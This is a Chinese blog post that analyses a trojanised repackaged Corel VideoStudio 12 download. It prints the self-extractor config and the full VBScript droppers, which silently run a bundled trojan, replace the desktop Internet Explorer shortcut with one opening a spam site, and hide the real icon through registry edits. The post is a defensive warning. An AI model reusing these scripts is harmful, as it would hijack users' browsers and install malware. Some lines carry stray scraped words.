简单***分析
须要使用会声会影编辑一点视频,搜到了会声会影 V12.0.0157.0 官方简体中文特别版,“起点下载”提供,在 http:// cncrk.com/downinfo/1648.html,可是有***,看看其手段如何:html
一、下载的为rar文件,展开后有一个UVS12.exe文件。shell
二、双击运行UVS12.exe,这是一个7zip压缩文件,展开压缩文件后自动运行a.vbs,你中招了。ide
7zip自动运行文件内容:网站
----------视频
;下面的注释包含自解压脚本命令htm
Setup=a.vbsip
Silent=1ci
Overwrite=1get
----------cmd
三、UVS12.exe内包含文件有:
360se.exe
a.vbs
b.vbs
o.ico
dx.exe
其中360se.exe是***,a.vbs和b.vbs是***植入程序;
o.ico是图标,dx.exe才是真正的会声会影程序。
四、a.vbs内容:
-----------
DIM objShell
set objShell=Wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C start dx.exe",0,TRUE)
iReturn=objShell.Run("cmd.exe /C start 360SE.exe",0,TRUE)
iReturn=objShell.Run("cmd.exe /C start b.vbs",0,TRUE)
-----------
大意是先执行会声会影安装,再安装***360se.exe,再执行b.vbs。
五、b.vbs内容:
-----------
On Error Resume Next
Set Wshshell=CreateObject("Wscript.Shell")
strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.*"
Wshshell.Run "cmd /c attrib -s -h -r "&chr(34)&strLinkFile&chr(34),0,1
Wshshell.Run "cmd /c del /f/a/q "&chr(34)&strLinkFile&chr(34),0,1
strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.lnk"
Set lnk=WshShell.CreateShortcut(strLinkFile)
lnk.TargetPath =Chr(34)&"C:\Program Files\Internet Explorer\IEXPLORE.EXE"&Chr(34)
lnk.Arguments="http://www.4442.cc"
lnk.Description = " "
lnk.Save
Wshshell.Run "cmd /c attrib +r "&chr(34)&strLinkFile&chr(34),0,1
Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1
Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1
strDesktop = WSHShell.SpecialFolders("Desktop")
WSHShell.AppActivate strDesktop
WSHShell.SendKeys "{F5}"
------------
大意是:
为垃圾网站4422创建C:\Program Files\Internet Explorer\IEXPLORE.EXE快捷方式参数,并修改注册表中IE快捷方式参数,也就是显示在桌面上的那个IE图标,最后刷新桌面显示。
六、dx.exe也是个7zip文件,来自于greendown.cn。
估计是“起点下载”从greendown.cn下载后从新打包后发布的。
提示一下,下载热门的东西,如各种xxx门的同窗应该留意下了,从上面就能够看出垃圾网站起点下载植入***的手段。
- 1. DHCP简单分析
- 2. OKHTTP 简单分析
- 3. ionic2简单分析
- 4. SettingsProvider简单分析
- 5. libevent简单分析
- 6. 简单分析MVVM
- 7. ArrayList简单分析
- 8. Jmeter 简单分析
- 9. SqlSessionFactoryBean简单分析
- 10. Etcd简单分析
- 更多相关文章...
- • Thymeleaf简单格式化输出 - Thymeleaf 教程
- • 互联网系统应用架构基础分析 - 红包项目实战
- • Github 简明教程
- • Git五分钟教程
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. python的安装和Hello,World编写
- 2. 重磅解读:K8s Cluster Autoscaler模块及对应华为云插件Deep Dive
- 3. 鸿蒙学习笔记2(永不断更)
- 4. static关键字 和构造代码块
- 5. JVM笔记
- 6. 无法启动 C/C++ 语言服务器。IntelliSense 功能将被禁用。错误: Missing binary at c:\Users\MSI-NB\.vscode\extensions\ms-vsc
- 7. 【Hive】Hive返回码状态含义
- 8. Java树形结构递归(以时间换空间)和非递归(以空间换时间)
- 9. 数据预处理---缺失值
- 10. 都要2021年了,现代C++有什么值得我们学习的?
- 1. DHCP简单分析
- 2. OKHTTP 简单分析
- 3. ionic2简单分析
- 4. SettingsProvider简单分析
- 5. libevent简单分析
- 6. 简单分析MVVM
- 7. ArrayList简单分析
- 8. Jmeter 简单分析
- 9. SqlSessionFactoryBean简单分析
- 10. Etcd简单分析